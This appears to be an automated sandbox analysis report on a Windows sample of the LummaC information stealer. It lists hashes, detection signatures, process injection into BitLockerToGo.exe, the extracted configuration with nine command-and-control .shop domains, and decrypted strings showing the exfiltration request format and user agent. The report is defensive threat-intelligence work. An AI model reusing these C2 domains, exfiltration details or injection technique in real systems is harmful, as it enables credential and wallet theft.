Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
Analysis ID:	1502490
MD5:	4b85d1518b4edc2239da008e3a91a323
SHA1:	bf33b8db7b6a40aff7f8a171e6d6169b2dac73fb
SHA256:	3266bf53273feea7374264865066f706462ea323d8c26cba051cfcbefc1fcb80
Tags:	exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Go Injector

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe" MD5: 4B85D1518B4EDC2239DA008E3A91A323)

BitLockerToGo.exe (PID: 3032 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

WerFault.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1440 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["consciousourwi.shop", "drinnkysoapmzv.shop", "cagedwifedsozm.shop", "weiggheticulop.shop", "interactiedovspm.shop", "potentioallykeos.shop", "charecteristicdxp.shop", "southedhiscuso.shop", "deicedosmzj.shop"], "Build id": "QWQBVm--Nueva1"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.2583891127.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621834022.000000C000400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C000304000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.2622890654.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000000.00000000.2030347840.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe PID: 6220	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
4.2.BitLockerToGo.exe.2fa0000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
4.2.BitLockerToGo.exe.2fa0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
0.0.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 7 entries

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (drinnkysoapmzv .shop) - Source IP: 192.168.2.5 - Destination IP: 172.67.174.127

Timestamp:	2024-09-01T22:24:56.391637+0200
SID:	2055364
Severity:	1
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-09-01T22:24:57.968819+0200
SID:	2055293
Severity:	1
Source Port:	49572
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:58.453576+0200
SID:	2055294
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-09-01T22:24:57.051523+0200
SID:	2055299
Severity:	1
Source Port:	56479
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-09-01T22:24:56.961672+0200
SID:	2055301
Severity:	1
Source Port:	52293
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:59.472042+0200
SID:	2049812
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:59.472042+0200
SID:	2054653
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 172.67.174.127

Timestamp:	2024-09-01T22:24:56.943733+0200
SID:	2049836
Severity:	1
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.174.127

Timestamp:	2024-09-01T22:24:56.943733+0200
SID:	2054653
Severity:	1
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.161.217

Timestamp:	2024-09-01T22:24:57.531011+0200
SID:	2055300
Severity:	1
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:58.569408+0200
SID:	2049836
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:58.569408+0200
SID:	2054653
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (drinnkysoapmzv .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-09-01T22:24:55.906452+0200
SID:	2055361
Severity:	1
Source Port:	58033
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 104.21.84.50

Timestamp:	2024-09-01T22:24:59.022856+0200
SID:	2055294
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 172.67.161.217

Timestamp:	2024-09-01T22:24:57.950673+0200
SID:	2049836
Severity:	1
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.161.217

Timestamp:	2024-09-01T22:24:57.950673+0200
SID:	2054653
Severity:	1
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://interactiedovspm.shop/T	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/h	Avira URL Cloud: Label: malware
Source: weiggheticulop.shop	Avira URL Cloud: Label: malware
Source: https://drinnkysoapmzv.shop/p	Avira URL Cloud: Label: phishing
Source: deicedosmzj.shop	Avira URL Cloud: Label: malware
Source: cagedwifedsozm.shop	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/api)	Avira URL Cloud: Label: malware
Source: consciousourwi.shop	Avira URL Cloud: Label: malware
Source: potentioallykeos.shop	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/api	Avira URL Cloud: Label: malware
Source: https://interactiedovspm.shop/api	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/	Avira URL Cloud: Label: malware
Source: https://drinnkysoapmzv.shop/api	Avira URL Cloud: Label: phishing
Source: southedhiscuso.shop	Avira URL Cloud: Label: malware
Source: interactiedovspm.shop	Avira URL Cloud: Label: malware
Source: https://interactiedovspm.shop/	Avira URL Cloud: Label: malware
Source: https://drinnkysoapmzv.shop/	Avira URL Cloud: Label: phishing
Source: drinnkysoapmzv.shop	Avira URL Cloud: Label: phishing
Source: https://potentioallykeos.shop/api9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["consciousourwi.shop", "drinnkysoapmzv.shop", "cagedwifedsozm.shop", "weiggheticulop.shop", "interactiedovspm.shop", "potentioallykeos.shop", "charecteristicdxp.shop", "southedhiscuso.shop", "deicedosmzj.shop"], "Build id": "QWQBVm--Nueva1"}

Multi AV Scanner detection for domain / URL

Source: interactiedovspm.shop	Virustotal: Detection: 20%	Perma Link
Source: charecteristicdxp.shop	Virustotal: Detection: 20%	Perma Link
Source: drinnkysoapmzv.shop	Virustotal: Detection: 19%	Perma Link
Source: potentioallykeos.shop	Virustotal: Detection: 20%	Perma Link
Source: https://potentioallykeos.shop/h	Virustotal: Detection: 11%	Perma Link
Source: weiggheticulop.shop	Virustotal: Detection: 19%	Perma Link
Source: cagedwifedsozm.shop	Virustotal: Detection: 21%	Perma Link
Source: deicedosmzj.shop	Virustotal: Detection: 21%	Perma Link
Source: consciousourwi.shop	Virustotal: Detection: 21%	Perma Link
Source: https://interactiedovspm.shop/api	Virustotal: Detection: 21%	Perma Link
Source: potentioallykeos.shop	Virustotal: Detection: 20%	Perma Link
Source: https://drinnkysoapmzv.shop/api	Virustotal: Detection: 15%	Perma Link
Source: https://potentioallykeos.shop/api	Virustotal: Detection: 21%	Perma Link
Source: interactiedovspm.shop	Virustotal: Detection: 20%	Perma Link
Source: southedhiscuso.shop	Virustotal: Detection: 20%	Perma Link
Source: drinnkysoapmzv.shop	Virustotal: Detection: 19%	Perma Link
Source: https://drinnkysoapmzv.shop/	Virustotal: Detection: 16%	Perma Link
Source: https://interactiedovspm.shop/	Virustotal: Detection: 20%	Perma Link
Source: https://potentioallykeos.shop/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	ReversingLabs: Detection: 60%
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Virustotal: Detection: 67%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: weiggheticulop.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: consciousourwi.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: southedhiscuso.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: deicedosmzj.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cagedwifedsozm.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: charecteristicdxp.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: interactiedovspm.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: potentioallykeos.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: drinnkysoapmzv.shop
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp	String decryptor: QWQBVm--Nueva1

Source: unknown	HTTPS traffic detected: 172.67.174.127:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.161.217:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.50:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.50:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000534000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000476000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2606479076.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2619863522.000000000323D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000534000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000476000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2606479076.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2619863522.000000000323D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_02FAAB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	4_2_02FD269E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02FD4D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	4_2_02FC02C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FBB2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [esp+48h]	4_2_02FBB2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	4_2_02FB4A9D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	4_2_02FB4A9D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02FAE28D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_02FB3240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+50h]	4_2_02FB4208
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_02FB3BE1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h	4_2_02FB2BBF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+18h]	4_2_02FB2BBF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02FAFBA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+ebx], 0000h	4_2_02FB7B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	4_2_02FB58E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FB408C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FB408C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02FD3870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, edx	4_2_02FD3870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FC01EF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_02FB39D9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push esi	4_2_02FB49C3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02FB0185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02FB0185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02FB0185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	4_2_02FB9160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	4_2_02FAE93D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000A88h]	4_2_02FBB120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FAE110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02FD4EF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	4_2_02FB9EEE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	4_2_02FBF662
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx]	4_2_02FBEE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_02FBEE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FBEE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	4_2_02FB179D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, edx	4_2_02FBFF44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_02FBFF44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FBFF44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [esi+04h]	4_2_02FBFF44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_02FC1720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ecx	4_2_02FB24DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02FB24DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	4_2_02FB24DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h	4_2_02FB2BBF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+18h]	4_2_02FB2BBF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	4_2_02FBAC79
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, edx	4_2_02FD3C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_02FC1420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+08h]	4_2_02FA95E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	4_2_02FA35E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_02FCADC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	4_2_02FCF5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	4_2_02FBF592
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_02FC258B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	4_2_02FC258B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi+25h]	4_2_02FA4D80
